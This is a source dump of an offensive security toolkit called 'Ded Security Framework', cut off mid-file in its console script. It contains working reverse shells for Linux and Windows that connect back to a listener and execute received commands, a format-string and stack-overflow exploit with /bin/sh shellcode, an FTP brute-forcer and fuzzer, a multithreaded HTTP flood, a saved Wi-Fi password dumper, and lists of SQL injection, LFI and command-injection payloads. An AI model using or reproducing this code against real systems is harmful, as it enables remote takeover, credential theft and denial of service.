├── VERSION
├── install.sh
├── public
├── terminalded.png
└── logosemfundo.png
├── __pycache__
└── main.cpython-37.pyc
├── network
├── wifi.pyw
├── curl.ts
├── speciport.py
├── banner_grabbing.py
├── hoic.rs
├── bruteftp.py
└── scannernmap.py
├── requirements.txt
├── exploit
├── use-buf.txt
├── connect.py
├── readme.md
├── fuzzftp.py
├── buf.c
├── test.py
└── main.rs
├── cat.ts
├── remote
├── remotelinux.py
└── remotewindows.py
├── LICENSE
├── content.json
├── README.md
├── .github
└── workflows
│ └── codeql-analysis.yml
├── main.py
└── dedframe.py
/VERSION:
--------------------------------------------------------------------------------
1 | __version__ = '2.3'
2 |
--------------------------------------------------------------------------------
/install.sh:
--------------------------------------------------------------------------------
1 | sudo apt install dirb -y
2 | sudo apt install host -y
3 | sudo apt install bind9-host -y
--------------------------------------------------------------------------------
/public/terminalded.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dedsecurity/dedsecurity-framework/HEAD/public/terminalded.png
--------------------------------------------------------------------------------
/public/logosemfundo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dedsecurity/dedsecurity-framework/HEAD/public/logosemfundo.png
--------------------------------------------------------------------------------
/__pycache__/main.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dedsecurity/dedsecurity-framework/HEAD/__pycache__/main.cpython-37.pyc
--------------------------------------------------------------------------------
/network/wifi.pyw:
--------------------------------------------------------------------------------
1 | import os
2 |
3 | os.system("netsh wlan show profile")
4 | os.system("netsh wlan export profile folder=C:\ key=clear")
5 |
6 |
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | python-nmap
2 | python-whois
3 | requests
4 | tensorflow
5 | numpy
6 | pandas
7 | nltk
8 | matplotlib
9 | scikit-learn
10 |
--------------------------------------------------------------------------------
/exploit/use-buf.txt:
--------------------------------------------------------------------------------
1 | $ gcc buf.c
2 |
3 | $ sudo socat TCP-LISTEN:1337,nodelay,reuseaddr,fork EXEC:"stdbuf -i0 -o0 -e0 ./a.out"
4 |
5 | $ sudo nc localhost 1337
6 |
7 |
--------------------------------------------------------------------------------
/network/curl.ts:
--------------------------------------------------------------------------------
1 | const url_ = Deno.args[0];
2 | const res = await fetch(url_);
3 |
4 | const body = new Uint8Array(await res.arrayBuffer());
5 | await Deno.stdout.write(body);
--------------------------------------------------------------------------------
/cat.ts:
--------------------------------------------------------------------------------
1 | for (let i = 0; i < Deno.args.length; i++) {
2 | const filename = Deno.args[i];
3 | const file = await Deno.open(filename);
4 | await Deno.copy(file, Deno.stdout);
5 | file.close();
6 | }
7 |
--------------------------------------------------------------------------------
/exploit/connect.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | import socket
3 |
4 | buffer = ("A")
5 |
6 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
7 | s.connect(("192.168.1.105",21))
8 | r = s.recv(1024)
9 | print (r)
10 | s.send("USER "+buf+"\r\n")
11 | r = s.recv(1024)
12 | print (r)
--------------------------------------------------------------------------------
/network/speciport.py:
--------------------------------------------------------------------------------
1 | import socket, sys
2 |
3 | portas = [21, 22, 25, 80, 81, 110, 143, 443, 587, 2525, 3306, 8080, 8082, 8443]
4 |
5 | for porta in portas:
6 | cliente = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
7 | cliente.settimeout(0.1)
8 | codigo = cliente.connect_ex((sys.argv[1], porta))
9 | if codigo == 0:
10 | print(porta, "OPEN")
11 |
--------------------------------------------------------------------------------
/exploit/readme.md:
--------------------------------------------------------------------------------
1 | ## Exploit Written in Python
2 |
3 |
4 | Details
5 |
6 |
7 |
8 | 
9 |
10 |
11 | Make your settings and run
12 |
13 | ```bash
14 | Website: https://dedsecurity.com
15 | Author: Simon Kinjo
16 | Maintenance: Simon Kinjo
17 | ```
18 |
--------------------------------------------------------------------------------
/exploit/fuzzftp.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | import socket
3 |
4 | buffer=["A"]
5 | contador = (100)
6 | while len(buffer) <= 25:
7 | buffer.append("A"*contador)
8 | contador = contador+200
9 |
10 | for string in buffer:
11 | print("Fuzzing FTP USER com %s bytes"%len(string))
12 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
13 | s.connect(("192.168.0.124",21))
14 | s.send("USER "+string+"\r\n")
--------------------------------------------------------------------------------
/remote/remotelinux.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import subprocess
3 | ip="192.168.0.178"
4 | port=888
5 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
6 | s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
7 | s.connect((ip,port))
8 | while True:
9 | command=s.recv(1024)
10 | if command == b'exit':
11 | s.close()
12 | break
13 | else:
14 | proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
15 | output= proc.stdout.read()+proc.stderr.read()
16 | s.send(output)
17 |
--------------------------------------------------------------------------------
/network/banner_grabbing.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 |
3 | import socket
4 |
5 | def retbanner(ip,port):
6 | try:
7 | socket.setdefaulttimeout(2)
8 | s = socket.socket()
9 | s.connect((ip,port))
10 | banner = s.recv(1024)
11 | return banner
12 | except:
13 | return
14 | def main():
15 | ip = input("[*] Enter Target Ip: ")
16 | for port in range(1,100):
17 | banner = retbanner(ip,port)
18 | if banner:
19 | print("[+]" + ip + ": " + banner)
20 | main()
--------------------------------------------------------------------------------
/exploit/buf.c:
--------------------------------------------------------------------------------
1 | // HELLO ADJ JAJAJAJA
2 | // %p %p %p %p %p %p
3 | // %a
4 |
5 |
6 |
7 | #include
8 | #include
9 |
10 | void C_Application_Firewall(char* in_buf){
11 | for(char c = *in_buf++; c != '\x00'; c = *in_buf++) {
12 | if(c=='A') {
13 | printf("You have been banned!\n");
14 | printf("Your IP has been reported.\n");
15 | exit(-1);
16 | }
17 | }
18 | }
19 |
20 | void CAFtest() {
21 | char buff[256] = {0};
22 | printf("\nC Application Firewall Test - please try a payload:\n");
23 | gets(buff);
24 | C_Application_Firewall(buff);
25 | printf(buff);
26 | }
27 |
28 | int main(int argc, char* argv[]) {
29 | while(1) {
30 | CAFtest();
31 | }
32 | }
--------------------------------------------------------------------------------
/network/hoic.rs:
--------------------------------------------------------------------------------
1 | use std::thread;
2 | use std::net::{TcpStream, Shutdown};
3 | use std::io::prelude::*;
4 |
5 | fn attack_thread(target: &str) {
6 | let mut stream = TcpStream::connect(target).unwrap();
7 | let attack_string = "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n";
8 |
9 | loop {
10 | stream.write(attack_string.as_bytes()).unwrap();
11 | }
12 | }
13 |
14 | fn main() {
15 |
16 | let target = "172.31.64.20:80";
17 | let num_threads = 500;
18 |
19 | let mut threads = vec![];
20 |
21 | for _ in 0..num_threads {
22 | let target_clone = target.to_string();
23 | let handle = thread::spawn(move || {
24 | attack_thread(&target_clone);
25 | });
26 | threads.push(handle);
27 | }
28 |
29 | for handle in threads {
30 | handle.join().unwrap();
31 | }
32 | }
--------------------------------------------------------------------------------
/network/bruteftp.py:
--------------------------------------------------------------------------------
1 | #coding: utf-8
2 | #!/usr/bin/python3
3 | import socket
4 | import re
5 | import sys
6 |
7 | if len(sys.argv) < 2:
8 | print("Use python bruteftp.py 127.0.0.1 user")
9 | sys.exit(0)
10 |
11 | usuario = sys.argv[2]
12 |
13 | file = open("lista.txt") # <-- your wordlist
14 | for linha in file.readlines():
15 |
16 | print(f"Testing with {usuario}:{linha}")
17 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
18 | s.connect((sys.argv[1],21))
19 | s.recv(1024)
20 | s.send(bytes("USER" + usuario + "\r\n", "utf-8"))
21 | s.recv(1024)
22 | s.send(bytes("PASS "+linha+"\r\n", "utf-8"))
23 | resulta = s.recv(1024)
24 | s.send(bytes("QUIT\r\n", "utf-8"))
25 |
26 | if re.search("230", "resulta"):
27 | print(f"[+] ===>>> PASSWORD FOUND <<<=== {linha}")
28 | break
29 | else:
30 | print("[-] ACESS DENIED [-]")
31 |
--------------------------------------------------------------------------------
/exploit/test.py:
--------------------------------------------------------------------------------
1 | import struct
2 | import socket
3 |
4 | s = socket.socket()
5 | s.connect(('127.0.0.1', 1337))
6 |
7 | r = s.recv(1024)
8 | s.send(b"%p,%p,%p\n")
9 |
10 | while b',' not in r:
11 | r = s.recv(1024)
12 | start_buf = int(r.split(b',') [1], 16)-9
13 | print("leaked start of buffer: 0x{:08x}".format(start_buf))
14 |
15 | input('EXPLOIT?')
16 | padding = b"dsuhagf ujkagsefjkygvasbjyfgvebaysufgvbeuaysbfvgajsyvbgjasyvbgfjkaysegvbfyjavbgfeyabvfgjyabvfyjagbvfyavbkjfeygvbaekjfygbvayesjgvbkajefvygbaejkyfgbaesyjbxreayksfugaskhjfedukasjfheasgv,ekirfaklsfgskaeifygdahs,fkjeuaskl.ejgfsajhfetgvasbkjfghevbafyutdlsfaekifgbsajkdua"
17 | RIP = struct.pack(b"Q", start_buf+len(padding)+8)
18 | shellcode = b"\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x05"
19 | payload = padding + RIP + shellcode
20 | s.send(payload)
21 |
22 | from telnetlib import Telnet
23 | t = Telnet()
24 | t.sock = s
25 | t.interact()
26 | s.close
27 |
28 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2020 Simon Kinjo
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/network/scannernmap.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 |
3 | import nmap
4 |
5 | scanner = nmap.PortScanner()
6 |
7 | print("welcome simple nmap tool")
8 | print("<--------------------------------->")
9 | print("<|-----------DED-SECURITY--------|>")
10 | print("<--------------------------------->")
11 |
12 | ip_addr = input("please enter your IP address you want scan: ")
13 | print("The ip you entered is: ", ip_addr)
14 | type(ip_addr)
15 |
16 | resp = input("""\nPlease enter the type of scan you want run
17 | snmap -T4 -A -v) Intense Scan [*]
18 | snmap -sS -sU -T4 -A -v) UDP Scan [*]
19 | snmap -v -sS -sV -A -O) Comprehensive Scan [*] \ndedsecurity> """)
20 | print("You have selected option: ", resp)
21 |
22 | if resp == 'snmap -T4 -A -v':
23 | print("Nmap Version: ", scanner.nmap_version())
24 | scanner.scan(ip_addr, '1-1024', '-T4 -A -v')
25 | print(scanner.scaninfo())
26 | print("Ip Status: ", scanner[ip_addr].state())
27 | print(scanner[ip_addr].all_protocols())
28 | print("Open Ports: ", scanner[ip_addr]['tcp'].keys())
29 | elif resp == 'snmap -sS -sU -T4 -A -v':
30 | print("Nmap Version: ", scanner.nmap_version())
31 | scanner.scan(ip_addr, '1-1024', '-sS -sU -T4 -A -v')
32 | print(scanner.scaninfo())
33 | print("Ip Status: ", scanner[ip_addr].state())
34 | print(scanner[ip_addr].all_protocols())
35 | print("Open Ports: ", scanner[ip_addr]['udp'].keys())
36 | elif resp == 'snmap -v -sS -sV -A -O':
37 | print("Nmap Version: ", scanner.nmap_version())
38 | scanner.scan(ip_addr, '1-1024', '-v -sS -sV -A -O')
39 | print(scanner.scaninfo())
40 | print("Ip Status: ", scanner[ip_addr].state())
41 | print(scanner[ip_addr].all_protocols())
42 | print("Open Ports: ", scanner[ip_addr]['tcp'].keys())
43 | elif resp>= '4':
44 | print("Please enter a valid option: ")
45 |
--------------------------------------------------------------------------------
/remote/remotewindows.py:
--------------------------------------------------------------------------------
1 | import asyncio
2 | import socket
3 |
4 | HOST = "192.168.0.178" # your ip
5 | PORT = 888 # your port
6 |
7 | async def shell():
8 | while 1:
9 | try:
10 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
11 | s.connect((HOST, PORT))
12 |
13 | while 1:
14 | proc = await asyncio.create_subprocess_shell("cmd",
15 | stdin=asyncio.subprocess.PIPE,
16 | stdout=asyncio.subprocess.PIPE,
17 | stderr=asyncio.subprocess.STDOUT)
18 | cmd = b"\n"
19 | proc.stdin.write(cmd)
20 |
21 | while 1:
22 | while 1:
23 | out = await proc.stdout.readline()
24 | break_ = out.decode("latin-1")
25 | if break_[-2:] == ">\n" or break_[-3:] == "> \n":
26 | s.send(out[:-1])
27 | break
28 | elif break_.endswith(">" + cmd.decode()) or break_.endswith("> " + cmd.decode()):
29 | pass
30 | else:
31 | s.send(out)
32 |
33 | cmd = s.recv(1024)
34 | cmd_ = cmd.decode()
35 | if cmd_ == "\n":
36 | proc.stdin.write(b"\n")
37 | elif cmd_.startswith("exit"):
38 | proc.terminate()
39 | break
40 | else:
41 | proc.stdin.write(cmd + b"\n")
42 | except Exception as e:
43 | print(e)
44 | asyncio.set_event_loop_policy(asyncio.WindowsProactorEventLoopPolicy())
45 | asyncio.run(shell())
46 |
--------------------------------------------------------------------------------
/exploit/main.rs:
--------------------------------------------------------------------------------
1 | // How to build:
2 | // > rustc main.rs
3 |
4 | // Right password:
5 | // > printf "dedsecurity\n" | ./main
6 |
7 | // Universal password:
8 | // > printf "bbbbbbbbbbbbbbb\0bbbbbbbbbbbbbbb\0" | ./main
9 |
10 |
11 | use std::io::{BufRead, Write};
12 |
13 | const BUF_CAP: usize = 16;
14 |
15 | type Ptr = usize;
16 |
17 | fn alloc_buffer(mem: &mut Vec::, size: usize) -> Ptr {
18 | let result = mem.len();
19 | for _ in 0..size {
20 | mem.push(' ')
21 | }
22 | result
23 | }
24 |
25 | fn alloc_str(mem: &mut Vec, s: &str) -> Ptr {
26 | let result = mem.len();
27 | for c in s.chars() {
28 | mem.push(c)
29 | }
30 | mem.push('\0');
31 | result
32 | }
33 |
34 | fn read_line_into_buffer(input: &mut impl BufRead, mem: &mut Vec, buf: Ptr) {
35 | let mut s = String::new();
36 | let n = input.read_line(&mut s).unwrap();
37 | for (i, c) in s.chars().enumerate() {
38 | mem[buf + i] = c;
39 | }
40 | if mem[buf + n - 1] == '\n' {
41 | mem[buf + n - 1] = '\0'
42 | } else {
43 | mem[buf + n] = '\0';
44 | }
45 | }
46 |
47 | fn streq(mem: &Vec, mut s1: Ptr, mut s2: Ptr) -> bool {
48 | while mem[s1] != '\0' && mem[s2] != '\0' {
49 | if mem[s1] != mem[s2] {
50 | return false;
51 | }
52 | s1 += 1;
53 | s2 += 1;
54 | }
55 |
56 | mem[s1] == '\0' && mem[s2] == '\0'
57 | }
58 |
59 | fn main() {
60 | let mut mem = Vec::::new();
61 | let buffer = alloc_buffer(&mut mem, BUF_CAP);
62 | let password = alloc_str(&mut mem, "dedsecurity");
63 | alloc_buffer(&mut mem, BUF_CAP);
64 |
65 | print!("Password: ");
66 | std::io::stdout().flush().unwrap();
67 | read_line_into_buffer(&mut std::io::stdin().lock(), &mut mem, buffer);
68 |
69 | if streq(&mem, buffer, password) {
70 | println!("Access Granted!")
71 | } else {
72 | println!("Access Denied!")
73 | }
74 | }
--------------------------------------------------------------------------------
/content.json:
--------------------------------------------------------------------------------
1 | {"intents":
2 | [
3 | {
4 | "tag":"phpinjection",
5 | "input":["/index.php?arg=1; phpinfo()", "/index.php?arg=1; system('id')"],
6 | "responses":["Code Injection PHP"]
7 | },
8 | {
9 | "tag":"portallogin",
10 | "input":["inurl:/doc/page/login.asp?", "inurl:/sap/bc/webdynpro/ logon", "intitle:'ST Web Client'"],
11 | "responses":["Pages Containing Login Portals"]
12 | },
13 | {
14 | "tag":"xsscodevuln",
15 | "input":["","' />", "", "", ""],
16 | "responses":["XSS"]
17 | },
18 | {
19 | "tag":"Sqlinjection",
20 | "input":["'UNION SELECT NULL,NULL,NULL -- -", "'UNION SELECT NULL,NULL,NULL FROM DUAL -- -", "' UNION SELECT @@version -- -", "' UNION SELECT table_name,NULL from INFORMATION_SCHEMA.TABLES -- -", "' UNION SELECT column_name,NULL from INFORMATION_SCHEMA.COLUMNS where table_name='X' -- -", "' UNION SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a') -- -"],
21 | "responses":["SQL INJECTION"]
22 | },
23 | {
24 | "tag":"lfi",
25 | "input":["foo.php?file=../../../../../../../etc/passwd", "/example1.php?page=expect://ls", ""],
26 | "responses":["LFI"]
27 | },
28 | {
29 | "tag":"csrf",
30 | "input":["
"],
31 | "responses":["CSRF"]
32 | },
33 | {
34 | "tag":"securitymisconfiguration",
35 | "input":["DELETE /users/ { 'id':}", "POST /files { 'title':'test.php' 'binary':'BINARY FOR FILE' } "],
36 | "responses":["SECURITY MISCONFIGURATION"]
37 | },
38 | {
39 | "tag":"ssrf",
40 | "input":["POST /product/stock HTTP/1.0 Content-Type: application/x-www-form-urlencoded Content-Length: 118 stockApi=http://192.168.0.68/admin"],
41 | "responses":["SSRF"]
42 | }
43 |
44 | ]
45 | }
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | Ded Security Framework
4 |
5 | ```bash
6 | Website: https://www.dedsecurity.com
7 | Author: Simon Kinjo
8 | Maintenance: Simon Kinjo
9 | ```
10 | >Ded Security Framework is a tool aimed at security professionals
11 | ---
12 |
13 | 
14 |
15 | ## Installation
16 |
17 | Make sure you have installed the dependencies:
18 |
19 | * `python` 3
20 | * `git`
21 | * `deno`
22 | * `gcc`
23 |
24 | Clone the [source] with `git`:
25 | ```sh
26 | git clone https://github.com/dedsecurity/dedsecurity-framework
27 | cd dedsecurity-framework
28 | ```
29 |
30 | [source]: https://github.com/dedsecurity/dedsecurity-framework
31 |
32 | Use the package manager [pip](https://pip.pypa.io/en/stable/) to install the libraries.
33 |
34 | ```bash
35 | pip install -r requirements.txt
36 | ```
37 | ---
38 |
39 | ```bash
40 | $ chmod +x install.sh
41 | $ ./install.sh
42 | ```
43 |
44 | ## Tools
45 |
46 | - Port-scanner
47 |
48 | - Banner-grabbing is a technique used to gain information about a computer system on a network and the services running on its open ports. Administrators can use this to take inventory of the systems and services on their network.
49 |
50 | - Exploit-Buffer Overflow
51 |
52 | - Remote access for Windows
53 |
54 | - Remote access for Linux
55 |
56 | - Brute-Force FTP
57 |
58 | - Curl
59 |
60 | - wifi.py is a software that obtains the wifi passwords saved on the computer
61 |
62 | - cat.js shows the contents of the file
63 |
64 | - speciport.py shows specific ports
65 |
66 | - dedframe.py is the console
67 |
68 | - dpc - Real-time semantic code analysis - powered by AI
69 |
70 | # Usage remote access
71 | run remotelinux.py or remotewindows.py and then run in the terminal
72 |
73 | ```bash
74 | nc -l -p 888 -v
75 | ```
76 |
77 | you have to install the netcat
78 |
79 | # Use curl
80 |
81 | ```bash
82 | deno run --allow-net curl.ts https://google.com
83 | ```
84 | you have to install the deno
85 |
86 | # Usage cat
87 |
88 | ```bash
89 | deno run --allow-read cat.ts test.txt
90 | ```
91 |
92 | # Using specific port
93 |
94 | ```bash
95 | python speciport.py dedsecurity.com
96 | ```
97 | ---
98 |
99 | ## Contributing
100 | Feel free to submitting pull requests to us.
101 | ## License
102 | [MIT](https://opensource.org/licenses/MIT)
103 |
--------------------------------------------------------------------------------
/.github/workflows/codeql-analysis.yml:
--------------------------------------------------------------------------------
1 | # For most projects, this workflow file will not need changing; you simply need
2 | # to commit it to your repository.
3 | #
4 | # You may wish to alter this file to override the set of languages analyzed,
5 | # or to provide custom queries or build logic.
6 | name: "CodeQL"
7 |
8 | on:
9 | push:
10 | branches: [master]
11 | pull_request:
12 | # The branches below must be a subset of the branches above
13 | branches: [master]
14 | schedule:
15 | - cron: '0 5 * * 1'
16 |
17 | jobs:
18 | analyze:
19 | name: Analyze
20 | runs-on: ubuntu-latest
21 |
22 | strategy:
23 | fail-fast: false
24 | matrix:
25 | # Override automatic language detection by changing the below list
26 | # Supported options are ['csharp', 'cpp', 'go', 'java', 'javascript', 'python']
27 | language: ['python']
28 | # Learn more...
29 | # https://docs.github.com/en/github/finding-security-vulnerabilities-and-errors-in-your-code/configuring-code-scanning#overriding-automatic-language-detection
30 |
31 | steps:
32 | - name: Checkout repository
33 | uses: actions/checkout@v2
34 | with:
35 | # We must fetch at least the immediate parents so that if this is
36 | # a pull request then we can checkout the head.
37 | fetch-depth: 2
38 |
39 | # If this run was triggered by a pull request event, then checkout
40 | # the head of the pull request instead of the merge commit.
41 | - run: git checkout HEAD^2
42 | if: ${{ github.event_name == 'pull_request' }}
43 |
44 | # Initializes the CodeQL tools for scanning.
45 | - name: Initialize CodeQL
46 | uses: github/codeql-action/init@v1
47 | with:
48 | languages: ${{ matrix.language }}
49 | # If you wish to specify custom queries, you can do so here or in a config file.
50 | # By default, queries listed here will override any specified in a config file.
51 | # Prefix the list here with "+" to use these queries and those in the config file.
52 | # queries: ./path/to/local/query, your-org/your-repo/queries@main
53 |
54 | # Autobuild attempts to build any compiled languages (C/C++, C#, or Java).
55 | # If this step fails, then you should remove it and run the build manually (see below)
56 | - name: Autobuild
57 | uses: github/codeql-action/autobuild@v1
58 |
59 | # ℹ️ Command-line programs to run using the OS shell.
60 | # 📚 https://git.io/JvXDl
61 |
62 | # ✏️ If the Autobuild fails above, remove it and uncomment the following three lines
63 | # and modify them (or add more) to build your code if your project
64 | # uses a compiled language
65 |
66 | #- run: |
67 | # make bootstrap
68 | # make release
69 |
70 | - name: Perform CodeQL Analysis
71 | uses: github/codeql-action/analyze@v1
72 |
--------------------------------------------------------------------------------
/main.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding: utf-8 -*-
3 |
4 | import tensorflow as tf
5 | import numpy as np
6 | import pandas as pd
7 | import json
8 | import random
9 | import time
10 | from tensorflow.keras.preprocessing.text import Tokenizer
11 | from tensorflow.keras.layers import Input, Embedding, LSTM , Dense,GlobalMaxPooling1D,Flatten
12 | from tensorflow.keras.models import Model
13 |
14 | import matplotlib.pyplot as plt
15 |
16 | print(tf.__version__)
17 |
18 | def time_matmul(x):
19 | start = time.time()
20 | for loop in range(10):
21 | tf.matmul(x, x)
22 |
23 | result = time.time()-start
24 |
25 | print("10 loops: {:0.2f}ms".format(1000*result))
26 |
27 | # Force execution on CPU
28 | print("On CPU:")
29 | with tf.device("CPU:0"):
30 | x = tf.random.uniform([1000, 1000])
31 | assert x.device.endswith("CPU:0")
32 | time_matmul(x)
33 |
34 | # Force execution on GPU #0 if available
35 | if tf.config.list_physical_devices("GPU"):
36 | print("On GPU:")
37 | with tf.device("GPU:0"): # Or GPU:1 for the 2nd GPU, GPU:2 for the 3rd etc.
38 | x = tf.random.uniform([1000, 1000])
39 | assert x.device.endswith("GPU:0")
40 | time_matmul(x)
41 |
42 | with open('./content.json') as content:
43 | databa = json.load(content)
44 |
45 | tags = []
46 | inputs = []
47 | responses={}
48 | for intent in databa['intents']:
49 | responses[intent['tag']]=intent['responses']
50 | for lines in intent['input']:
51 | inputs.append(lines)
52 | tags.append(intent['tag'])
53 |
54 | data = pd.DataFrame({"inputs":inputs,
55 | "tags":tags})
56 |
57 | data = data.sample(frac=1)
58 |
59 | import string
60 | data['inputs'] = data['inputs'].apply(lambda wrd:[ltrs.lower() for ltrs in wrd if ltrs not in string.punctuation])
61 | data['inputs'] = data['inputs'].apply(lambda wrd: ''.join(wrd))
62 |
63 | tokenizer = Tokenizer(num_words=2000)
64 | tokenizer.fit_on_texts(data['inputs'])
65 | train = tokenizer.texts_to_sequences(data['inputs'])
66 |
67 | from tensorflow.keras.preprocessing.sequence import pad_sequences
68 | x_train = pad_sequences(train)
69 |
70 |
71 | from sklearn.preprocessing import LabelEncoder
72 | le = LabelEncoder()
73 | y_train = le.fit_transform(data['tags'])
74 |
75 | input_shape = x_train.shape[1]
76 | print(input_shape)
77 |
78 | vocabulary = len(tokenizer.word_index)
79 | print("number of unique words : ",vocabulary)
80 | output_length = le.classes_.shape[0]
81 | print("output length: ",output_length)
82 |
83 | i = Input(shape=(input_shape,))
84 | x = Embedding(vocabulary+1,10)(i)
85 | x = LSTM(10,return_sequences=True)(x)
86 | x = Flatten()(x)
87 | x = Dense(output_length,activation="softmax")(x)
88 | model = Model(i, x)
89 |
90 | model.compile(loss="sparse_categorical_crossentropy",optimizer='adam',metrics=['accuracy'])
91 |
92 | train = model.fit(x_train,y_train,epochs=300)
93 |
94 | plt.plot(train.history['accuracy'],label='training set accuracy')
95 | plt.plot(train.history['loss'],label='training set loss')
96 | plt.legend()
97 |
98 | while True:
99 |
100 | import random
101 |
102 | texts_p = []
103 | prediction_input = input(': ')
104 |
105 | prediction_input = [letters.lower() for letters in prediction_input if letters not in string.punctuation]
106 | prediction_input = ''.join(prediction_input)
107 | texts_p.append(prediction_input)
108 |
109 | prediction_input = tokenizer.texts_to_sequences(texts_p)
110 | prediction_input = np.array(prediction_input).reshape(-1)
111 | prediction_input = pad_sequences([prediction_input],input_shape)
112 |
113 |
114 | output = model.predict(prediction_input)
115 | output = output.argmax()
116 |
117 | response_tag = le.inverse_transform([output])[0]
118 | print(random.choice(responses[response_tag]))
--------------------------------------------------------------------------------
/dedframe.py:
--------------------------------------------------------------------------------
1 | __author__ = 'Simon Kinjo'
2 | __version__ = '2.3'
3 | __name__ = 'Ded Security Framework'
4 |
5 | import os
6 | import whois
7 | import requests
8 | import base64
9 | import platform
10 | import webbrowser
11 | import subprocess
12 | from base64 import urlsafe_b64encode, urlsafe_b64decode
13 | from requests.models import encode_multipart_formdata
14 |
15 |
16 | banner = """
17 | @@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@ @@@@@@@@ @@@@@@@ @@@ @@@ @@@@@@@ @@@ @@@@@@@ @@@ @@@
18 | @@! @@@ @@! @@! @@@ !@@ @@! !@@ @@! @@@ @@! @@@ @@! @@! @@! !@@
19 | @!@ !@! @!!!:! @!@ !@! !@@!! @!!!:! !@! @!@ !@! @!@!!@! !!@ @!! !@!@!
20 | !!: !!! !!: !!: !!! !:! !!: :!! !!: !!! !!: :!! !!: !!: !!:
21 | :: : : : :: ::: :: : : ::.: : : :: ::: :: :: : :.:: : : : : : : .:
22 | www.dedsecurity.com
23 | """
24 |
25 | print(banner)
26 |
27 | print(f"\033[33m[{__name__} v{__version__}, {__author__}]\033[m")
28 |
29 | google_hacking = 'https://www.google.com/search?q='
30 |
31 | def help():
32 | print("""
33 | Commands:
34 | ---------------------------------
35 | help - Displays this menu
36 | exit - To exit
37 | clear - Linux
38 | cls - Windows
39 | robots - Get robots.txt
40 | speciport - Shows specific ports
41 | curl - Website source code
42 | banner - Banner-Grabbing
43 | portscan - Port-Scanner
44 | wifi - This software obtains the wifi passwords saved on the computer
45 | subdomain - Shows the subdomains
46 | whois - Consult contact information and DNS about entities on the internet
47 | geoip - Feature that allows you to determine the geographic position of a device based on a coordinate system
48 | traceroute - Traceroute is a diagnostic tool that tracks a packet's route through a computer network using IP and ICMP protocols
49 | ping - Utility that uses the ICMP protocol to test connectivity between devices
50 | google - Google Hacking
51 | exploitdb - Google Hacking Database
52 | login - Pages containing login portals
53 | ondevice - Online devices
54 | indexof - Index of a website
55 | dmarc - Is a standard email authentication method. ... These reports contain information that identifies potential authentication issues and malicious activity in messages sent from your domain.
56 | dirb - Brute force with multiple mass names and handles their return code identifying whether they are returned or not
57 | listeningport - listening port to backdoor
58 | dedsecurity - Ded Security Website
59 | xss - Xss codes
60 | reverseshell - Bash reverse shell
61 | sqlinjection - Sql injection codes
62 | encode - Base64 Encoder
63 | decode - Base64 Decoder
64 | powershellhandy - Powershell handy commands
65 | webserver - A web server in Python
66 | shell - Executes shell commands
67 | pdb - Starts a Python Debugger session (dev only)
68 | dpc - Real-time semantic code analysis - powered by AI
69 | """)
70 |
71 | def subdomain():
72 | domain = input("Website: ")
73 |
74 | file = open("network/listsubdomain.txt")
75 | content = file.read()
76 | subdomains = content.splitlines()
77 |
78 | discovered_subdomains = []
79 | for subdomain in subdomains:
80 |
81 | url = f"http://{subdomain}.{domain}"
82 | try:
83 | requests.get(url)
84 | except requests.ConnectionError:
85 |
86 | pass
87 | else:
88 |
89 | print("subdomain:", url)
90 | discovered_subdomains.append(url)
91 |
92 | def traceroute():
93 | t = input("Website/Ip: ")
94 | if platform.system() == 'Linux':
95 | os.system("traceroute "+t)
96 | elif platform.system() == 'Windows':
97 | os.system("tracert "+t)
98 |
99 |
100 | def encode(data):
101 | return urlsafe_b64encode(bytes(data, 'utf-8'))
102 |
103 | def decode(enc):
104 | return urlsafe_b64decode(enc).decode()
105 |
106 | def webserver():
107 | if platform.system() == 'Linux':
108 | os.system("python3 -m http.server 8080")
109 | elif platform.system() == 'Windows':
110 | os.system("python -m http.server 8080")
111 |
112 | def shell():
